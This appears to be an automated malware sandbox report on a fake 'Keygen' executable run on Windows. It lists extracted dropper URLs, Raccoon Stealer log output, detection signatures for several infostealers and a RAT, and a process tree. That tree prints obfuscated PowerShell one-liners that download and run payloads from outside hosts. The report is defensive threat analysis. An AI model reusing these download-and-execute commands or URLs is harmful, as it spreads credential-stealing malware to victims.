Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    132s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (2).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:25:49 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (457 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия — копия (2).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия — копия (2).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:604
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\7C70.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? — ????? (2).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1044
      • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1684
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7C70.tmp\m.hta"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:844
          • C:\Users\Public\mnq.exe
            "C:\Users\Public\mnq.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2724
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2924
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3056
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3056 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\536621414141397\\* & exit
                  8⤵
                    PID:2904
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3056
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3036
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2948
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2092
              • C:\Users\Public\mnq.exe
                "C:\Users\Public\mnq.exe"
                6⤵
                  PID:3004
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7C70.tmp\m1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1856
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:628
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:1396
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7C70.tmp\b.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1780
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1152
              • C:\Users\Public\ypt.exe
                "C:\Users\Public\ypt.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:2604
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                  6⤵
                  • Loads dropped DLL
                  PID:2600
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2648
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                      8⤵
                      • Loads dropped DLL
                      PID:2928
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        9⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2304
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                          10⤵
                          • Executes dropped EXE
